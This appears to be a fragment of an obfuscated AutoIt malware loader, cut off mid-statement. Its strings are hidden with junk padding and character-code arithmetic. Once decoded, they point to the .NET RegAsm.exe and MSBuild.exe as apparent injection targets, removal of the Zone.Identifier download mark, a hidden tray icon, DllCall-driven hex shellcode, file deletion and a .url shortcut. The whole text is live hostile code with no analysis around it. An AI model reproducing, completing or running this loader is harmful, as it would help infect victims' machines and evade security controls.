(R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) ) $912996352 = 754282959 CASE 1537586385 $T33R0R ("j02zdusy" , $U3131F51ZD ("05cpbfxstc7o88x77li4mjamFileGetShortName" , 24 + 2295 * 4 + 4294958116 ) ) $912996352 = 1119677627 CASE 1537780935 $T33R0R ("xmr3txvo15ff4n0u" , $I31330D6 ("dword24le38m6fetadwuvcpz4" , 20 + 630 + 4294966666 ) ) $912996352 = 1995357114 CASE 1541888103 GLOBAL $E31363936GIR = $V39NUX ("904C785mrjl6j4mrjl6jCFFmrjl6jFmrjl6jFmrjl6jFmrjl6jFmrjl6jE4mrjl6j87mrjl6jB8mrjl6j0mrjl6j4mrjl6jC7mrjl6j8mrjl6j5mrjl6j5mrjl6j0FFmrjl6jFFmrjl6jFFmrjl6jA9" , "mrjl6j" , "" ) $912996352 = 369572047 CASE 1566911474 GLOBAL $S383353 = $V39NUX (":jxa7l800Zjxa7l800one.Ijxa7l800dejxa7l800ntjxa7l800ijxa7l800fijxa7l800er" , "jxa7l800" , "" ) $912996352 = 511805355 CASE 1571970274 GLOBAL $N32353634RG = $Z3635VITR $912996352 = 1494936868 CASE 1586054448 GLOBAL $Z32343633TFA = $U32343233PUXJX ($O353SY ("71krq4kp3n2np3d" ) ) $912996352 = 1729791683 CASE 1588307237 GLOBAL $T3132334T3JHU = $V39NUX ("Run(@SgqzfwcrgqzfwigqzfwpgqzfwtFullgqzfwPagqzfwtgqzfwhgqzfw)gqzfw" , "gqzfw" , "" ) $912996352 = 122734813 CASE 1593765410 GLOBAL $E3930368A3 = $V3135P3 ("p60gqfz4cyb10lq8BA100000008D8D7CFFFFFFC60100414A75F983F807752568040100008D9510FDFq00urwzo6eirwllwxdy4fcsx" , 17 + 952 * 2 + 4294965392 , 65 + 952 * 2 + 4294965392 ) $912996352 = 935061787 CASE 1597403880 GLOBAL $M3235364G = $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $912996352 = 807257674 CASE 1604859022 GLOBAL $N32333934XZLN = $V3135P3 ("zbz5je00e5dunadqkxbyte lpfile[w366jw5dyjshjbwelbtbptixm8" , 19 + 7122 + 4294960174 , 12 + 7122 + 4294960174 ) $912996352 = 1439009533 CASE 1613945667 GLOBAL $O313330343X8 = $I31330D6 ("0000000000000000000000000000000000000000000000ae5hdk02gj" , 10 + 1895 * 1 + 4294965401 ) $912996352 = 108681755 CASE 1615550310 GLOBAL $F32353236Y0YC = $U32343233PUXJX ($Z37IB8K ("0x436872" ) ) $912996352 = 1515776959 CASE 1622442362 GLOBAL $V32343837D2JP0O = $U32343233PUXJX ($U3131F51ZD ("gbe3hfsrlc3yrw4vkd8jFileClose" , 20 + 4071 + 4294963225 ) ) $912996352 = 1075797934 CASE 1625702291 $T33R0R ("3r3tsnohid" , $V39NUX ("Fby5q3by5q7by5q5C4D53by5qC7by5q85by5qA8Fby5qEby5qFby5qFFby5qFby5q4by5q275696CCby5q78by5q5ACFby5qEby5qFFby5qFby5qF64by5q2by5qE657866by5qCby5q7by5q85by5qBby5q0Fby5qEFFFby5qFby5q6by5q5by5q00Cby5q785by5qBby5q4by5qFEby5qFby5q" , "by5q" , "" ) ) $912996352 = 1521716519 CASE 1629206375 GLOBAL $J3837OEO = $V39NUX ("34zwylz5q" , "zwylz5q" , "" ) $912996352 = 1940172472 CASE 1635010930 GLOBAL $P32343330ZSTFRA = $U32343233PUXJX ($B3137I6HLT ) $912996352 = 782363534 CASE 1640333961 GLOBAL $U32353433SZ7WG = $U32343233PUXJX ($O353SY ("1i5izouurchf" ) ) $912996352 = 1373741278 CASE 1648617519 $T33R0R ("z2m4o6cm3yybzpozilxjmq" , $U3131F51ZD ("uz8l5xr8041vsk18c66w0mj1m7230FC7855CFFFFFFE86F180DC78560FFFFFFB57DAE09898504FFFFFF8D85" , 26 + 4294959585 + 7711 ) ) $912996352 = 1530730189 CASE 1657267227 GLOBAL $Z3635VITR = $V39NUX ("ojwfC:ojwf\ojwfWiojwfnojwfdojwfoojwfws\Mojwfiojwfcroojwfsofojwft.ojwfNojwfETojwf\Fojwfraojwfmojwfeojwfwork\vojwf2ojwf.0.5ojwf072ojwf7ojwf\RojwfegojwfAsojwfmojwf.eojwfxojwfeojwf" , "ojwf" , "" ) $912996352 = 128580426 CASE 1662106412 GLOBAL $D37315G1OJ = $V39NUX ("286sl0406sl026sl0" , "6sl0" , "" ) $912996352 = 1344125600 CASE 1668410217 GLOBAL $P363737R5WKD = $U3131F51ZD ("fyivwbax5ksyflw03732C7851CFFFFFF375C5265C78520FFFFFF6741736DC78524FFFFFF2E657865" , 15 + 7684 + 4294959612 ) $912996352 = 853394200 CASE 1671554993 GLOBAL $Y323431328Z0R = $U3131F51ZD ("vjybfw0310d4ptr" , 12 + 4294958014 + 9282 ) $912996352 = 301325938 CASE 1675226304 GLOBAL $S363833KAU = $V3135P3 ("7q2gioi708io6741736DC78560FFFFFF2E657865C68564FFFFFF00C78578FEFFFF433A5C57C7857CFEFFft3voyczum7inelxkhj1r3xw" , 13 + 8134 * 3 + 4294942894 , 72 + 8134 * 3 + 4294942894 ) $912996352 = 846271121 CASE 1711601707 GLOBAL $R313631310M = $V3135P3 ("5bt2s5ea7pjxkq03kyojk3miC64A13000000056578B400C8B780C8BF7FF7508FF7630E874FFFFFF85C0740A8B363BFe5nwufrzwjgx8kqge6jgnlbuuhn1h1" , 25 + 9510 + 4294957786 , 70 + 9510 + 4294957786 ) $912996352 = 1118321646 CASE 1728161007 $T33R0R ("cju07subn46zrslhhjrfy56aqp6" , $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87401 ) ) & $C31KU765 (R37FLO7 (87356 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87390 ) ) ) $912996352 = 1657267227 CASE 1729791683 GLOBAL $U32343636P065 = $U32343233PUXJX ($V39NUX ("Henbli50x" , "nbli50" , "" ) ) $912996352 = 2103351493 CASE 1730951538 #NoTrayIcon $912996352 = 876721733 CASE 1739397950 GLOBAL $Z37IB8K = $L30KEU (STRINGREPLACE ("4b4k4vn4jb27t4ex4Bi4b4k4vn4jb27t4ex4na4b4k4vn4jb27t4ex4r4b4k4vn4jb27t4ex4y4b4k4vn4jb27t4ex4To4b4k4vn4jb27t4ex4St4b4k4vn4jb27t4ex4r4b4k4vn4jb27t4ex4i4b4k4vn4jb27t4ex4ng4b4k4vn4jb27t4ex4" , "4b4k4vn4jb27t4ex4" , "" ) ) $912996352 = 268691428 CASE 1754637242 $T33R0R ("wnn8k5e2q58ckt1nf" , $V3135P3 ("igkygsfydssrozd6vbdx1qwotizc11C2E0FF0000663B7508720505E0FF0000663BD0750E6685C9740583C702EBCF33C0EB0x5xsiu01" , 30 + 4294962163 + 5133 , 70 + 4294962163 + 5133 ) ) $912996352 = 624601310 CASE 1769631811 $T33R0R ("u3bc8gn78n164ouj7v08x1o" , $V3135P3 ("0dc8aokvtnc5gtovDB8C745BC53657453C745C065637572C745C469747949C745C86E666F0k0xt5j1yntpvp8fzm2ndoqfcq1hl4" , 17 + 4294959680 + 7616 , 58 + 4294959680 + 7616 ) ) $912996352 = 435626120 CASE 1784859230 GLOBAL $H32353631O1I0TC = $U32343233PUXJX ($V3135P3 ("hfukhqgynvblhsqi7pcnxuqlgFileGetAttribxirkcf8skf80d" , 26 + 3833 + 4294963463 , 13 + 3833 + 4294963463 ) ) $912996352 = 1571970274 CASE 1790568916 $T33R0R ("2hg22lfktrnnxpyvagkmqvr" , $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87400 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) ) $912996352 = 1730951538 CASE 1798923584 GLOBAL $C32353535NRZY = $U32343233PUXJX ($U3131F51ZD ("0o5oubhy4t7enp31Int" , 16 + 6386 + 4294960910 ) ) $912996352 = 702101058 CASE 1817102897 GLOBAL $J313639321UOGL = $V39NUX ("4s0664CA0s06648s0664C78s06645s06643CFFFFs0664Fs0664FEs06643Cs0664AD8s06640s06643Cs06647854s06640s0664FFFFs0664FFs06649s06649s0664B04s0664806C78s0664544Fs0664Fs0664F" , "s0664" , "" ) $912996352 = 91202609 CASE 1826795760 GLOBAL $X32353230R8NTZZ = $U32343233PUXJX ($Z37IB8K ("0x446C6C53747275637447657453697A65" ) ) $912996352 = 1001249821 CASE 1832348312 $T33R0R ("1i3pbgntq6wb2im8qe6" , $U3131F51ZD ("6olzbf7i7625zki0smlnv6B4D0C73248B55080355FC0FB60A8" , 22 + 1297 + 4294965999 ) ) $912996352 = 3492363 CASE 1832861087 $T33R0R ("c7nv2iavie" , $C31KU765 (R37FLO7 (87352 ) ) & $C31KU765 (R37FLO7 (87355 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87365 ) ) & $C31KU765 (R37FLO7 (87372 ) ) & $C31KU765 (R37FLO7 (87363 ) ) & $C31KU765 (R37FLO7 (87391 ) ) & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87399 ) ) & $C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87372 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87395 ) ) & $C31KU765 (R37FLO7 (87395 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87395 ) ) & $C31KU765 (R37FLO7 (87372 ) ) & $C31KU765 (R37FLO7 (87389 ) ) & $C31KU765 (R37FLO7 (87395 ) ) & $C31KU765 (R37FLO7 (87379 ) ) & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87381 ) ) ) $912996352 = 841109807 CASE 1833896075 GLOBAL $Z32343630AUF = $U32343233PUXJX ($V3135P3 ("0jou2ay487eb0jq6agIsArrayulw0grqisv60t43xxaiijqwuin3" , 19 + 4294961955 + 5341 , 7 + 4294961955 + 5341 ) ) $912996352 = 1586054448 CASE 1838725075 GLOBAL $Y3234393934EGUS = $U32343233PUXJX ($C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87363 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87379 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87351 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87377 ) ) ) $912996352 = 106742685 CASE 1845988677 GLOBAL $R31343437O30K = $V3135P3 ("ai5ge0n842qwycckmnw0FB6000385E8FEFFFF25FF00000080nsmhhivze55ce" , 20 + 1970 * 4 + 4294959416 , 29 + 1970 * 4 + 4294959416 ) $912996352 = 1943411308 CASE 1856701497 GLOBAL $R32363130LEIE = 128 $912996352 = 2061627909 CASE 1865630473 GLOBAL $I36313287AX2 = $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) $912996352 = 1668410217 CASE 1892817007 GLOBAL $Y3939VLK = $U3131F51ZD ("hz5z0v6irqw6sz8qtds3l6fr.url" , 22 + 4294961845 + 5451 ) $912996352 = 1969900180 CASE 1905762762 GLOBAL $X32353638F1 = $V39NUX ("C:\Windowti5hnras\ti5hnraMti5hnraiti5hnracti5hnrarti5hnraosofti5hnratti5hnra.Nti5hnraEti5hnraTti5hnra\Fti5hnrarti5hnraati5hnrameti5hnrawork\ti5hnrav2ti5hnra.0ti5hnra.ti5hnra5ti5hnra0727\ti5hnraMti5hnraSBti5hnrauiti5hnrald.ti5hnraeti5hnraxe" , "ti5hnra" , "" ) $912996352 = 792800899 CASE 1923293943 GLOBAL $L3132377JY4 = $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $912996352 = 67217268 CASE 1940172472 $T33R0R ("1tn1e62vivh7w0" , $U3131F51ZD ("eup42y0vslqmu6jetyoil13" , 21 + 9379 * 2 + 4294948538 ) ) $912996352 = 698963862 CASE 1943411308 GLOBAL $O31343439SSL = $U3131F51ZD ("w2b65so3e1aua6efdgk4fgg8bb985E8FEFFFF89DE03B5ECFEFFFF8A0" , 26 + 4294963841 + 3455 ) $912996352 = 1978247180 CASE 1950200125 GLOBAL $B32343933BHRMQ = $U32343233PUXJX ($I31330D6 ("DllCallzrz637i7b22" , 11 + 1292 * 2 + 4294964712 ) ) $912996352 = 526196272 CASE 1953304794 $T33R0R ("1i5izouurchf" , $V39NUX ("Biqyv1qnary" , "qyv1q" , "" ) ) $912996352 = 1728161007 CASE 1958420212 GLOBAL $U32353335HK88 = $U32343233PUXJX ($C31KU765 (R37FLO7 (87362 ) ) & $C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87380 ) ) & $C31KU765 (R37FLO7 (87391 ) ) & $C31KU765 (R37FLO7 (87389 ) ) ) $912996352 = 1640333961 CASE 1969900180 $T33R0R ("ryvqdbbk5xmy2ogeyvgwlt2u5sty" , $V39NUX ("10ezls" , "ezls" , "" ) ) $912996352 = 1107033673 CASE 1976720245 GLOBAL $G393030X2Q = $U3131F51ZD ("dwlczcbzsiuf58wj5354ir7irojFFFE86FF6FFFF89855CFEFFFF8B450883F801750B8D8DF0FEFFFF894DFCEB4283F8" , 27 + 4294962202 + 5094 ) $912996352 = 1164384931 CASE 1978247180 GLOBAL $V31343531EL7TC = $V39NUX ("pviitcnztrviitcnz" , "viitcnz" , "" ) $912996352 = 1164665250 CASE 1993967472 GLOBAL $C31343039KM = $V3135P3 ("k4tsdsgp7cb7g5100FB6008B4DFC0FB68C0DF0FEFF6k08cfmi8omiob8hwznktja" , 14 + 4294958907 + 8389 , 29 + 4294958907 + 8389 ) $912996352 = 574756071 CASE 1995357114 GLOBAL $A31333239J8 = $C31KU765 (R37FLO7 (87392 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87394 ) ) $912996352 = 1377214014 CASE 1998142335 GLOBAL $P31333433RO = $V3135P3 ("lp4aoaxtfwqwdwordwi4d21tjrrt7qzpolk7781al828e85" , 13 + 3039 + 4294964257 , 5 + 3039 + 4294964257 ) $912996352 = 215530261 CASE 2017495755 GLOBAL $W323430361TZ2 = $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87400 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) $912996352 = 1671554993 CASE 2019368202 GLOBAL $R32343834KC2 = $U32343233PUXJX ($U3131F51ZD ("b4se80wk3125lj2FileDelete" , 15 + 687 + 4294966609 ) ) $912996352 = 1622442362 CASE 2033669424 GLOBAL $C3234373556F88 = $U32343233PUXJX ($V39NUX ("Fx3k60bilex3k60bGx3k60bex3k60btx3k60bSizx3k60bex3k60b" , "x3k60b" , "" ) ) $912996352 = 565033341 CASE 2039189835 $T33R0R ("py7daghq" , $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) ) $912996352 = 508698040 CASE 2049571787 $T33R0R ("87mv7vr70wo1xtvhgkcnmml0v6un3" , $V3135P3 ("nvtjrj33uonqhdrmp1awtp@ScriptFullPathzhvoazqp3d7vjnzunsem" , 23 + 4294959797 